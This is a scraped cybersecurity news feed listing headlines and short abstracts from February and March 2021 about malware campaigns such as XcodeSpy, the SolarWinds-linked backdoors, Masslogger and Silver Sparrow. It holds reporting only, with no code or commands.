Cybersecurity researchers on Thursday disclosed a new attack wherein threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves targeting developers and researchers with malicious attacks. Dubbed "XcodeSpy," the trojanized Xcode project is a tainted version of a legitimate, open-source project available on GitHub called TabBarInteraction that's used by developers to animate iOS tab bars based on user interaction. "XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism," SentinelOne researchers said. Xcode is Apple's integrated development environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS. Earlier this year, Google's Threat Analysis group uncovered a North Korean campaign aimed at security researcheThe Hacker News
March 18, 2021
XcodeSpy Mac malware targets Xcode Developers with a backdoor Full Text
Abstract
Unknown threat actors have been using a new XcodeSpy Mac malware to target software developers who use Apple’s Xcode integrated development environment. Researchers at SentinelOne uncovered a series of attacks involving a new XcodeSpy used to deliver...Security Affairs
March 18, 2021
New CopperStealer malware steals Google, Apple, Facebook accounts Full Text
Abstract
Previously undocumented account-stealing malware distributed via fake software crack sites targets the users of major service providers, including Google, Facebook, Amazon, and Apple.BleepingComputer
March 18, 2021
Mekotio Trojan is Using AutoHotKey to Avoid Detection Full Text
Abstract
The Mekotio trojan has been found using two separate emails as an initial infection vector which then abuses AutoHotKey (AHK) and the AHK compiler to steal users’ information.Cyware Alerts - Hacker News
March 18, 2021
How to Successfully Pursue a Career in Malware Analysis Full Text
Abstract
Are you looking to become a malware analyst? Then continue reading to discover how to gain the training you need and start a career in malware analysis. Did you know that new malware is released every seven seconds? As more and more systems become reliant on the internet, the proliferation of malware becomes increasingly destructive. Once upon a time, a computer virus might cause considerable inconvenience, but its reach might have been limited to the handful of systems connected to the internet. Today, with every home, factory, and institution online, it's theoretically possible for malware to shut down an entire nation. That's where malware analysis comes in. Malware analysis is the process of isolating and reverse-engineering malicious software. Malware analysts draw on a wide range of skills, from programming to digital forensics, to identify and understand different types of malware. From there, they can design security solutions to protect computers from simThe Hacker News
March 18, 2021
Apple developers targeted by malicious Xcode project Full Text
Abstract
The backdoor is able to record the victim’s microphone, camera and keyboard entries, plus can upload and download files.SCMagazine
March 18, 2021
Trojanized Xcode Project Slips MacOS Malware to Apple Developers Full Text
Abstract
In a new campaign, threat actors are bundling macOS malware in trojanized Apple Xcode developer projects.Threatpost
March 18, 2021
US taxpayers targeted with RAT malware in ongoing phishing attacks Full Text
Abstract
US taxpayers are being targeted by phishing attacks attempting to take over their computers using malware and steal sensitive personal and financial information.BleepingComputer
March 18, 2021
New XcodeSpy malware targets iOS devs in supply-chain attack Full Text
Abstract
A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply-chain attack to install a macOS backdoor on the developer's computer.BleepingComputer
March 18, 2021
Expert found a 1-Click RCE in the TikTok App for Android Full Text
Abstract
Egyptian security researcher Sayed Abdelhafiz discovered multiple bugs in TikTok Android Application that can be chained to achieve Remote code execution. Egyptian security researcher Sayed Abdelhafiz discovered multiple vulnerabilities in the TikTok...Security Affairs
March 18, 2021
Old RAT in New Theme Full Text
Abstract
Trustwave researchers have spotted a new malspam campaign that is exploiting icon files to deceive victims into executing the NanoCore RAT.Cyware Alerts - Hacker News
March 18, 2021
Fake Telegram Desktop App Malware Campaign Persists Full Text
Abstract
The .com and .net sites have seen 2,746 downloads of the malicious Windows executable, and a second-stage malware was then pushed down 129 times. The .org site snared 529 downloads in just two days.Info Risk Today
March 17, 2021
New Mirai Variant Targeting IoT & Network Security Devices Full Text
Abstract
Unit 42 researchers observed a new Mirai variant targeting IoT and network security devices. They discovered attacks leveraging several vulnerabilities, including:Cyber Security News
March 17, 2021
$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware Full Text
Abstract
The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.Threatpost
March 16, 2021
New Mirai variant appears in the threat landscape Full Text
Abstract
Palo Alto researchers uncovered a series of ongoing attacks to spread a variant of the infamous Mirai bot exploiting multiple vulnerabilities. Security experts at Palo Alto Networks disclosed a series of attacks aimed at delivering a Mirai variant...Security Affairs
March 16, 2021
Mimecast: SolarWinds hackers used Sunburst malware for initial intrusion Full Text
Abstract
Email security company Mimecast has confirmed today that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion.BleepingComputer
March 16, 2021
Threatening within Budget: How WSH-RAT is abused by Cyber-Crooks Full Text
Abstract
WSH-RAT kit is a complete Remote Administration tool sold in the underground and frequently abused by criminal actors relying on off-the-shelf kits to build their offensive campaigns.Yoroi
March 16, 2021
Taurus Stealer’s Evolution Full Text
Abstract
The individuals developing this threat have been actively improving the evasiveness of their loader since February 2021, which in turn made their payloads fully undetectable for almost a month.Minerva Labs
March 15, 2021
School district IT leaders grade their handling of past malware attacks Full Text
Abstract
Rockford Public Schools and Rockingham County Schools learned lessons in transparency, timely incident response, access management, data redundancy and disaster recovery.SCMagazine
March 15, 2021
Metamorfo Banking Trojan Leverages AutoHotKey (AHK) and the AHK compiler to Evade Detection Full Text
Abstract
A legitimate binary for creating shortcut keys in Windows is being used to help the malware sneak past defenses, in a rash...Cyber Security News
March 13, 2021
New variant for Mac Malware XCSSET compiled for M1 Chips Full Text
Abstract
Kaspersky researchers spotted a new variant of the XCSSET Mac malware that was compiled for devices running on Apple M1 chips. XCSSET is a Mac malware that was discovered by Trend Micro in August 2020; it was spreading through Xcode projects and exploits...Security Affairs
March 12, 2021
NimzaLoader Malware Developed Using a Rare Programming Language to Avoid Detection Full Text
Abstract
The research team from Proofpoint observed an interesting email campaign by a threat actor and tracked it as ‘TA800’. The TA800 threat...Cyber Security News
March 12, 2021
Researchers Spotted Malware Written in Nim Programming Language Full Text
Abstract
Cybersecurity researchers have unwrapped an "interesting email campaign" undertaken by a threat actor that has taken to distributing a new malware written in Nim programming language. Dubbed "NimzaLoader" by Proofpoint researchers, the development marks one of the rare instances of Nim malware discovered in the threat landscape. "Malware developers may choose to use a rare programming language to avoid detection, as reverse engineers may not be familiar with Nim's implementation, or focused on developing detection for it, and therefore tools and sandboxes may struggle to analyze samples of it," the researchers said. Proofpoint is tracking the operators of the campaign under the moniker "TA800," who, they say, started distributing NimzaLoader starting February 3, 2021. Prior to the latest raft of activity, TA800 is known to have predominantly used BazaLoader since April 2020. While APT28 has been previously linked to delivering ZebThe Hacker News
March 12, 2021
Clast82: A Dropper That Delivers Two Banking Trojans Full Text
Abstract
Check Point Research laid out details on financial trojans found embedded in at least ten Android-based apps by the same threat actor. The apps have been taken down by Google.Cyware Alerts - Hacker News
March 12, 2021
Microsoft Exchange exploits now used by cryptomining malware Full Text
Abstract
The operators of Lemon_Duck, a cryptomining botnet that targets enterprise networks, are now using Microsoft Exchange ProxyLogon exploits in attacks against unpatched servers.BleepingComputer
March 12, 2021
Malspam campaign uses icon files to deliver NanoCore RAT Full Text
Abstract
Researchers at Trustwave spotted a new malspam campaign that is abusing icon files to trick victims into installing the NanoCore Trojan. Researchers at Trustwave have spotted a new malspam campaign that is abusing icon files to trick victims...Security Affairs
March 11, 2021
FIN8 Resurfaces with Revamped Backdoor Malware Full Text
Abstract
The financial cyber-gang is running limited attacks ahead of broader offensives on point-of-sale systems.Threatpost
March 11, 2021
Chinese state hackers target Linux systems with new malware Full Text
Abstract
Security researchers at Intezer have discovered a previously undocumented backdoor dubbed RedXOR, with links to a Chinese-sponsored hacking group and used in ongoing attacks targeting Linux systems.BleepingComputer
March 11, 2021
Malware Operator Employs New Trick to Upload Its Dropper into Google Play Full Text
Abstract
Researchers at Check Point recently discovered that the operator of a mobile malware tool was employing a novel new method to sneak its malware into Google's official Android Play mobile app store.Dark Reading
March 10, 2021
Researchers Unveil New Linux Malware Linked to Chinese Hackers Full Text
Abstract
Cybersecurity researchers on Wednesday shed light on a new sophisticated backdoor targeting Linux endpoints and servers that's believed to be the work of Chinese nation-state actors. Dubbed "RedXOR" by Intezer, the backdoor masquerades as a polkit daemon, with similarities found between the malware and those previously associated with the Winnti Umbrella (or Axiom) threat group such as PWNLNX, XOR.DDOS and Groundhog. RedXOR's name comes from the fact that it encodes its network data with a scheme based on XOR, and that it's compiled with a legacy GCC compiler on an old release of Red Hat Enterprise Linux, suggesting that the malware is deployed in targeted attacks against legacy Linux systems. Intezer said two samples of the malware were uploaded from Indonesia and Taiwan around Feb. 23-24, both countries that are known to be singled out by China-based threat groups. Aside from the overlaps in terms of the overall flow and functionalities and thThe Hacker News
March 10, 2021
New malware tied to China targets Linux endpoints and servers Full Text
Abstract
The malware, called RedXOR because it was compiled on Red Hat Enterprise Linux and uses a network data encoding scheme based on XOR, creates a backdoor in systems that gives an attacker near full control over infected machines.SCMagazine
March 10, 2021
There’s Something We Don’t Talk Enough About - Mobile Malware Full Text
Abstract
The Ewind adware family totaled 65% of all adware samples, with FakeAdBlocker and HiddenAd right at its heels. Almost 2 million Ewind.kp Android installer packages were hidden in legitimate apps.Cyware Alerts - Hacker News
March 10, 2021
FIN8 Hackers Return With More Powerful Version of BADHATCH PoS Malware Full Text
Abstract
Threat actors known for keeping a low profile do so by ceasing operations for prolonged periods in between to evade attracting any attention as well as constantly refining their toolsets to fly below the radar of many detection technologies. One such group is FIN8 , a financially motivated threat actor that's back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution . First documented in 2016 by FireEye, FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems. "The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success," Bitdefender researchers said in a report publishedThe Hacker News
March 10, 2021
ZLoader Malware Hidden in Encrypted Excel File Full Text
Abstract
The ZLoader payload is a multipurpose Trojan that often acts as a dropper that delivers Zeus-based malware in multistage ransomware attacks, such as Ryuk and Egregor, a Forcepoint X-Labs report notes.Gov Info Security
March 9, 2021
Google Play Harbors Malware-Laced Apps Delivering Spy Trojans Full Text
Abstract
A never-before-seen malware-dropper, Clast82, fetches the AlienBot and MRAT malware in a savvy Google Play campaign aimed at Android users.Threatpost
March 9, 2021
Ursnif Trojan Terrorizes Banks Full Text
Abstract
Avast has found at least 100 banks in Italy being targeted by the Ursnif banking trojan. Researchers also found over 1,700 stolen credentials linked to a single payment processor.Cyware Alerts - Hacker News
March 09, 2021
9 Android Apps On Google Play Caught Distributing AlienBot Banker and MRAT Malware Full Text
Abstract
Cybersecurity researchers have discovered a new malware dropper contained in as many as 9 Android apps distributed via Google Play Store that deploys a second stage malware capable of gaining intrusive access to the financial accounts of victims as well as full control of their devices. "This dropper, dubbed Clast82, utilizes a series of techniques to avoid detection by Google Play Protect detection, completes the evaluation period successfully, and changes the payload dropped from a non-malicious payload to the AlienBot Banker and MRAT," Check Point researchers Aviran Hazum, Bohdan Melnykov, and Israel Wernik said in a write-up published today. The apps that were used for the campaign include Cake VPN, Pacific VPN, eVPN, BeatPlayer, QR/Barcode Scanner MAX, Music Player, tooltipnatorlibrary, and QRecorder. After the findings were reported to Google on January 28, the rogue apps were removed from the Play Store on February 9. Malware authors have resorted to a variety oThe Hacker News
March 9, 2021
Supernova Malware Analysis Links Chinese Threat Group Spiral to SolarWinds Server Hacks Full Text
Abstract
According to researchers, the CVE-2020-10148 authentication bypass vulnerability, which leads to the remote execution of API commands, in the SolarWinds Orion API has been exploited by Spiral.ZDNet
March 9, 2021
10 Google Play Apps Found Containing Banking Malware Full Text
Abstract
Malicious dropper also loaded RAT onto victim devicesInfosecurity Magazine
March 9, 2021
FluBot Android Malware Impersonates FedEx, DHL, Correos, Chrome Apps to Steal User Data Full Text
Abstract
FluBot infects Android devices by appearing as FedEx, DHL, Correos, and Chrome apps and forces users to change Accessibility settings so that it could maintain persistence on the device.Hackread
March 9, 2021
SUPERNOVA backdoor that emerged after SolarWinds hack is likely linked to Chinese actors Full Text
Abstract
Supernova malware clues link Chinese threat group Spiral to SolarWinds server hacks Supernova malware spotted on compromised SolarWinds Orion installs exposed on the Internet is likely linked to a China-linked espionage group. Researchers at Secureworks'...Security Affairs
March 08, 2021
Hackers hiding Supernova malware in SolarWinds Orion linked to China Full Text
Abstract
Intrusion activity related to the Supernova malware planted on compromised SolarWinds Orion installations exposed on the public internet points to an espionage threat actor based in China.BleepingComputer
March 08, 2021
Malware Can Exploit New Flaw in Intel CPUs to Launch Side-Channel Attacks Full Text
Abstract
New research has yielded yet another means to pilfer sensitive data by exploiting what's the first "on-chip, cross-core" side-channel in Intel Coffee Lake and Skylake processors. Published by a group of academics from the University of Illinois at Urbana-Champaign, the findings are expected to be presented at the USENIX Security Symposium coming this August. While information leakage attacks targeting the CPU microarchitecture have been previously demonstrated to break the isolation between user applications and the operating system, allowing a malicious program to access memory used by other programs (e.g., Meltdown and Spectre), the new attack leverages a contention on the ring interconnect. SoC Ring interconnect is an on-die bus arranged in a ring topology which enables intra-process communication between different components (aka agents) such as the cores, the last level cache (LLC), the graphics unit, and the system agent that are housed inside the CPU. EacThe Hacker News
March 8, 2021
SolarWinds just keeps getting worse: New strain of malware found infecting victims Full Text
Abstract
The malware strain, identified as SUNSHUTTLE by boffins at security shop FireEye, is a backdoor attack written in Go which uses HTTPS to communicate with a command-and-control server for data exfiltration, adding new code as needed.The Register
March 8, 2021
Intel CPU interconnects can be exploited by malware to leak encryption keys and other info, academic study finds Full Text
Abstract
This was tested on Intel Coffee Lake and Skylake CPUs, client-class CPUs, and should work on server CPUs like Xeon Broadwell. It's unknown whether more recent Intel server chips are susceptible.The Register
March 5, 2021
WordPress Injection Anchors Widespread Malware Campaign Full Text
Abstract
Website admins should patch all plugins, WordPress itself and back-end servers as soon as possible.Threatpost
March 5, 2021
GoldMax, GoldFinder, and Sibot, 3 new malware used by SolarWinds attackers Full Text
Abstract
Microsoft experts continue to investigate the SolarWinds attack and spotted 3 new strains of malware used as second-stage payloads. Microsoft announced the discovery of three new pieces of malware that the threat actors behind the SolarWinds attack,...Security Affairs
March 5, 2021
Ryuk Further Expands its Reach - Gets Worm-Like Capabilities Full Text
Abstract
With CERT-FR warning that Ryuk now has worm-like capabilities, attackers can now more quickly spread the malware inside a network. Earlier, it could only target one system at a time.Cyware Alerts - Hacker News
March 5, 2021
ObliqueRAT Learns Steganography Full Text
Abstract
Cyberattackers behind ObliqueRAT campaigns are now disguising the trojan in benign image files on hijacked websites. Four new versions of the malware have been recently discovered.Cyware Alerts - Hacker News
March 5, 2021
Stalkerware - A Nuisance Growing at Steady Pace Full Text
Abstract
Nidb family was the prominent stalkerware, impacting around 8,100 users around the world. This stalkerware-as-a-service was used to sell multiple products, such as iSpyoo, Copy9, and TheTruthSpy.Cyware Alerts - Hacker News
March 05, 2021
Researchers Find 3 New Malware Strains Used by SolarWinds Hackers Full Text
Abstract
FireEye and Microsoft on Thursday said they discovered three more malware strains in connection with the SolarWinds supply-chain attack, including a "sophisticated second-stage backdoor," as the investigation into the sprawling espionage campaign continues to yield fresh clues about the threat actor's tactics and techniques. Dubbed GoldMax (aka SUNSHUTTLE), GoldFinder, and Sibot, the new set of malware adds to a growing list of malicious tools such as Sunspot , Sunburst (or Solorigate), Teardrop , and Raindrop that were stealthily delivered to enterprise networks by alleged Russian operatives . "These tools are new pieces of malware that are unique to this actor," Microsoft said . "They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with Teardrop and other hands-on-keyboard actions." Microsoft alThe Hacker News
March 4, 2021
Microsoft, FireEye Unmask More Malware Linked to SolarWinds Attackers Full Text
Abstract
Researchers with Microsoft and FireEye found three new malware families, which they said are used by the threat group behind the SolarWinds attack.Threatpost
March 4, 2021
Sunshuttle, the fourth malware allegedly linked to SolarWinds hack Full Text
Abstract
FireEye researchers spotted a new sophisticated second-stage backdoor that was likely linked to threat actors behind the SolarWinds hack. Malware researchers at FireEye discovered a new sophisticated second-stage backdoor, dubbed Sunshuttle, while...Security Affairs
March 4, 2021
Microsoft links new malware to SolarWinds hackers Full Text
Abstract
Microsoft released details Thursday on later-stage malware the company says was used by the group behind the SolarWinds espionage campaign that breached several government agencies and private firms including Microsoft and FireEye. A coordinated blog from FireEye provided a separate deep dive on one of the malware strains in the Microsoft post, but the firm…SCMagazine
March 04, 2021
Microsoft reveals 3 new malware strains used by SolarWinds hackers Full Text
Abstract
Microsoft has revealed information on newly found malware the SolarWinds hackers deployed on victims' networks as second-stage payloads.BleepingComputer
March 04, 2021
Microsoft reveals new malware used by the SolarWinds hackers Full Text
Abstract
Microsoft has revealed information on newly found malware the SolarWinds hackers deployed on victims' networks as second-stage payloads.BleepingComputer
March 04, 2021
FireEye finds new malware likely linked to SolarWinds hackers Full Text
Abstract
FireEye discovered a new "sophisticated second-stage backdoor" on the servers of an organization compromised by the threat actors behind the SolarWinds supply-chain attack.BleepingComputer
March 4, 2021
New Malicious NPM Packages Attack Amazon & Slack Full Text
Abstract
Recently, the cybersecurity researchers at Sonatype have detected a very new type of "dependency confusion" packages that have been assigned to the...Cyber Security News
March 3, 2021
The Ursnif Trojan has hit over 100 Italian banks Full Text
Abstract
Avast researchers reported that the infamous Ursnif Trojan was employed in attacks against at least 100 banks in Italy. Avast experts recently obtained information on possible victims of Ursnif malware that confirms the interest of malware operators...Security Affairs
March 3, 2021
Hackers Using Tricky SEO Technique to Deliver Malware Payloads Full Text
Abstract
Gootloader appears to have expanded its payloads further as it now uses SEO poisoning to deliver an array of malware payloads against users in South Korea, Germany, France, and the U.S.Cyware Alerts - Hacker News
March 3, 2021
Mobile malware evolution 2020 Full Text
Abstract
In their campaigns to infect mobile devices, cybercriminals always resort to social engineering tools, the most common being passing a malicious application off as another, popular and desirable one.Kaspersky Labs
March 3, 2021
Researcher discovers Go typosquatting package that relays system information to Chinese tech firm Full Text
Abstract
One of two packages deemed to warrant further investigation purported to be the GitHub ‘cli’ repository that is widely used for building CLI (command-line interface) Go projects.The Daily Swig
March 3, 2021
ObliqueRAT Trojan now lurks in images on compromised websites Full Text
Abstract
Steganography is used to hide code, images, and video content within other content of file formats, and in this case, the researchers have found BMP files that contain malicious ObliqueRAT payloads.ZDNet
March 2, 2021
Compromised Website Images Camouflage ObliqueRAT Malware Full Text
Abstract
Emails spreading the ObliqueRAT malware now make use of steganography, disguising their payloads on compromised websites.Threatpost
March 2, 2021
Beware – Mobile Threats Shift Towards Banking Trojans and Adware Full Text
Abstract
Recently, in its Mobile Malware Evolution 2020 report, the well-known cybersecurity company Kaspersky reported on the prevailing mobile threat landscape and recognizes...Cyber Security News
March 02, 2021
Malicious NPM packages target Amazon, Slack with new dependency attacks Full Text
Abstract
Threat actors are targeting Amazon, Zillow, Lyft, and Slack NodeJS apps using the new 'Dependency Confusion' vulnerability to steal Linux/Unix password files and open reverse shells back to the attackers.BleepingComputer
March 01, 2021
Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites Full Text
Abstract
A framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads. "The Gootkit malware family has been around more than half a decade – a mature Trojan with functionality centered around banking credential theft," Sophos researchers Gabor Szappanos and Andrew Brandt said in a write-up published today. "In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself." Dubbed "Gootloader," the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S. First documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft. Over the years, theThe Hacker News
March 1, 2021
Gootkit delivery platform Gootloader used to deliver additional payloads Full Text
Abstract
The Javascript-based infection framework for the Gootkit RAT was enhanced to deliver a wider variety of malware, including ransomware. Experts from Sophos documented the evolution of the “Gootloader,” the framework used for delivering the Gootkit...Security Affairs
March 1, 2021
Mobile Adware Booms, Online Banks Become Prime Target for Attacks Full Text
Abstract
A snapshot of the 2020 mobile threat landscape reveals major shifts toward adware and threats to online banks.Threatpost
March 1, 2021
Go Malware Detections Increase 2000% Full Text
Abstract
Intezer warns of growing threat from programming languageInfosecurity Magazine
February 28, 2021
What are these suspicious Google GVT1.com URLs? Full Text
Abstract
These Google-owned domains have confused even the most skilled researchers and security products time and time again as to whether they are malicious. The domains in question are redirector.gvt1.com and gvt1/gvt2 subdomains that have spun many threads on the internet. BleepingComputer has dug deeper into the origin of these domains.BleepingComputer
February 27, 2021
LazyScripter Hackers Using Multiple RATs to Target Airlines Full Text
Abstract
Malwarebytes spots a new threat group dubbed LazyScripter that targets the International Air Transport Association (IATA) members, airlines, and refugees to Canada.Cyware Alerts - Hacker News
February 27, 2021
A New Malware Shares Similarities With WaterBear Full Text
Abstract
Palo Alto Networks found a highly sophisticated malware potentially linked to the BlackTech hacking group. It has features and behavior that strongly resembles the WaterBear malware family.Cyware Alerts - Hacker News
February 27, 2021
Go malware is now common, having been adopted by both APTs and e-crime groups Full Text
Abstract
The number of malware strains coded in the Go programming language has seen a sharp increase of around 2,000% over the last few years, since 2017, cybersecurity firm Intezer said in a report published this week.ZDNet
February 26, 2021
Stalkerware Volumes Remain Concerningly High, Despite Bans Full Text
Abstract
COVID-19 impacted volumes for the year, but the U.S. moved into third place on the list of countries most infected by stalkerware.Threatpost
February 26, 2021
Malware Gangs Partner Up in Double-Punch Security Threat Full Text
Abstract
From TrickBot to Ryuk, more malware cybercriminal groups are putting their heads together when attacking businesses.Threatpost
February 26, 2021
Malicious Firefox extension allowed hackers to hijack Gmail accounts Full Text
Abstract
Several Tibetan organizations were targeted in a cyber-espionage campaign by a state-backed hacking group using a malicious Firefox extension designed to hijack Gmail accounts and infect victims with malware.BleepingComputer
February 26, 2021
SQL Triggers in Website Backdoors Full Text
Abstract
Over the past year, there’s been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries within compromised databases to infiltrate them.Sucuri
February 25, 2021
ThreatNeedle malware tied to year-long North Korean espionage campaign against global defense industry Full Text
Abstract
Researchers at Kaspersky have tied a piece of malware used by Lazarus Group last seen targeting security vulnerability researchers earlier this year to another campaign by the North Korean hacking group focused on pilfering sensitive data from defense contractors.SCMagazine
February 25, 2021
Malicious Mozilla Firefox Extension Allows Gmail Takeover Full Text
Abstract
The malicious extension, FriarFox, snoops in on both Firefox and Gmail-related data.Threatpost
February 25, 2021
Researchers Uncovered a New Office Malware Builder Dubbed APOMacroSploit Full Text
Abstract
Security researchers at Check Point have recently discovered a new Office malware builder named APOMacroSploit. This malware has been...Cyber Security News
February 25, 2021
Turkey Dog Campaign Targets Turkish Speakers with Trojanized Apps via COVID Lures Full Text
Abstract
The current Turkey Dog-related campaigns use lure pages that promise cash payments of thousands of Turkish Lira, purporting to be tied to the Turkish government to steal information or plant malware.Risk IQ
February 24, 2021
Masslogger Malware Adopts New Initial Attack Technique Full Text
Abstract
A variant of Masslogger Trojan is being used by criminals to steal Microsoft Outlook, Google Chrome, and Messenger account credentials.Cyware Alerts - Hacker News
February 24, 2021
Mac and Windows Devices Pelted with New Threats Full Text
Abstract
Researchers discovered two pieces of malware in a span of two weeks that appear to run natively on Apple’s recently introduced M1 System-on-Chip (SoC).Cyware Alerts - Hacker News
February 23, 2021
Lazarus Group Using AppleJeus Malware for Cryptocurrency Theft Full Text
Abstract
A joint cybersecurity advisory from the U.S. government is warning against AppleJeus malware, the Lazarus group's new development, that masquerades as crypto trading software.Cyware Alerts - Hacker News
February 23, 2021
Return of the MINEBRIDGE RAT With New TTPs and Social Engineering Lures Full Text
Abstract
Once triggered, MINEBRIDGE buries itself into the vulnerable TeamViewer, enabling attackers to take a wide array of remote follow-on actions such as spying on users or deploying additional malware.Zscaler
February 22, 2021
Google Alerts used to launch fake Adobe Flash Player updater Full Text
Abstract
The threat actors are “quite clever” in using Google Alerts as an attack vector to prompt users to “update” Adobe Flash Player.SCMagazine
February 22, 2021
New Silver Sparrow malware infects 30,000 Macs for unknown purpose Full Text
Abstract
A new macOS malware known as Silver Sparrow has silently infected almost 30,000 Mac devices with malware whose purpose is a mystery.BleepingComputer
February 22, 2021
IronNetInjector: Turla’s New Malware Loading Tool Full Text
Abstract
The method, known as Bring Your Own Interpreter (BYOI), involves use of an interpreter, not present on a system by default, to run malicious code of an interpreted programming or scripting language.Palo Alto Networks
February 22, 2021
Researchers uncovered a new Malware Builder dubbed APOMacroSploit Full Text
Abstract
Researchers spotted a new Office malware builder, tracked as APOMacroSploit, that was employed in a campaign targeting more than 80 customers worldwide. Researchers from security firm Check Point uncovered a new Office malware builder called APOMacroSploit,...Security Affairs
February 21, 2021
Warning: Google Alerts abused to push fake Adobe Flash updater Full Text
Abstract
Threat actors are using Google Alerts to promote a fake Adobe Flash Player updater that installs other unwanted programs on unsuspecting users' computers.BleepingComputer
February 20, 2021
Silver Sparrow, a new malware infects Mac systems using Apple M1 chip Full Text
Abstract
Experts warn of new malware, dubbed Silver Sparrow, that is infecting Mac systems using the latest Apple M1 chip across the world. Malware researchers at Red Canary uncovered a new malware, dubbed Silver Sparrow, that is infecting Mac systems using...Security Affairs
February 19, 2021
Mysterious Silver Sparrow Malware Found Nesting on 30K Macs Full Text
Abstract
A second malware that targets Macs with Apple’s in-house M1 chip is infecting machines worldwide — but it’s unclear why.Threatpost
February 19, 2021
New Masslogger Trojan variant exfiltrates user credentials Full Text
Abstract
The infamous MassLogger Windows credential stealer is back and it has been upgraded to steal credentials from Outlook, Chrome, and instant messenger apps. MassLogger Windows credential stealer is back and it has been upgraded to steal credentials from...Security Affairs
February 19, 2021
Experts spotted the first malware tailored for Apple M1 Chip, it is just the beginning Full Text
Abstract
Apple launched its M1 chip and cybercriminals developed a malware sample specifically for it; the latest generation of Macs are their next targets. The popular security researcher Patrick Wardle discovered one of the first malware samples designed to target...Security Affairs
February 19, 2021
AppleJeus: Analysis of North Korea’s Cryptocurrency Malware Full Text
Abstract
This joint advisory is the result of analytic efforts among the FBI, the CISA, and the Treasury to highlight the threat to cryptocurrency posed by North Korea and provide mitigation recommendations.CISA
February 19, 2021
Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials Full Text
Abstract
A credential stealer infamous for targeting Windows systems has resurfaced in a new phishing campaign that aims to steal credentials from Microsoft Outlook, Google Chrome, and instant messenger apps. Primarily directed against users in Turkey, Latvia, and Italy starting mid-January, the attacks involve the use of MassLogger — a .NET-based malware with capabilities to hinder static analysis — building on similar campaigns undertaken by the same actor against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020. MassLogger was first spotted in the wild last April, but the presence of a new variant implies malware authors are constantly retooling their arsenal to evade detection and monetize them. "Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain," researchers with Cisco Talos said on WThe Hacker News
February 18, 2021
Second malware strain primed to attack Apple’s new M1 chip identified Full Text
Abstract
In just three months, hackers have debuted at least two strains of malware designed to attack Apple’s new M1 chip. Noted Mac security researcher Patrick Wardle published a blog Feb. 14 noting that a Safari adware extension that was originally written to run on Intel x86 chips was revamped to run on the new M1…SCMagazine
February 18, 2021
US shares info on North Korean malware used to steal cryptocurrency Full Text
Abstract
The FBI, CISA, and US Department of Treasury shared detailed info on malicious and fake crypto-trading applications used by North Korean-backed state hackers to steal cryptocurrency from individuals and companies worldwide in a joint advisory published on Wednesday.BleepingComputer
February 18, 2021
Cred-stealing trojan harvests logins from Chromium browsers, Outlook and more, warns Cisco Talos Full Text
Abstract
Delivered through phishing emails, the Masslogger trojan’s latest variant is contained within a multi-volume RAR archive using the .chm file format and .r00 extensions, said Switchzilla researchers.The Register
February 18, 2021
First Malware Designed for Apple M1 Chip Discovered in the Wild Full Text
Abstract
One of the first malware samples tailored to run natively on Apple's M1 chips has been discovered, suggesting a new development that indicates that bad actors have begun adapting malicious software to target the company's latest generation of Macs powered by its own processors. While the transition to Apple silicon has necessitated developers to build new versions of their apps to ensure better performance and compatibility, malware authors are now undertaking similar steps to build malware that is capable of executing natively on Apple's new M1 systems, according to macOS Security researcher Patrick Wardle. Wardle detailed a Safari adware extension called GoSearch22 that was originally written to run on Intel x86 chips but has since been ported to run on ARM-based M1 chips. The rogue extension, which is a variant of the Pirrit advertising malware, was first seen in the wild on November 23, 2020, according to a sample uploaded to VirusTotal on December 27. "TodThe Hacker News
February 17, 2021
Trickbot’s Sibling, Bazarbackdoor, is Hunting Down its Targets Vigorously Full Text
Abstract
Researchers have observed a newer, stealthier version of BazarBackdoor, which is written in Nim language to enhance its evasion capabilities, being increasingly distributed through spam campaigns.Cyware Alerts - Hacker News
February 17, 2021
ScamClub malvertising gang abused WebKit zero-day to redirect to online gift card scams Full Text
Abstract
Malvertising gang ScamClub has exploited an unpatched zero-day vulnerability in WebKit-based browsers in a campaign aimed at realizing online gift card scams. The Malvertising gang ScamClub has abused an unpatched zero-day vulnerability in WebKit-based...Security Affairs
February 17, 2021
Latin American Javali Trojan Exploits Avira Antivirus Legitimate Injector to Implant Malware Full Text
Abstract
The Javali trojan has been active since November 2017 and targets users of financial and banking organizations geolocated in Brazil and Mexico using similar routines as other Latin American trojans.Security Affairs
February 17, 2021
Latin American Javali trojan weaponizing Avira antivirus legitimate injector to implant malware Full Text
Abstract
Latin American Javali trojan weaponizing Avira antivirus legitimate injector to implant malware In the last few years, many banking trojans developed by Latin American criminals have increased in volume and sophistication. Although there exists a strong...Security Affairs
February 15, 2021
The malicious code in SolarWinds attack was the work of 1,000+ developers Full Text
Abstract
Microsoft says it found 1,000-plus developers' fingerprints on the SolarWinds attack Microsoft’s analysis of the SolarWinds supply chain attack revealed that the code used by the threat actors was the work of a thousand developers. Microsoft...Security Affairs
February 14, 2021
Hildegard: TeamTNT’s New Feature-Rich Malware Targeting Kubernetes Full Text
Abstract
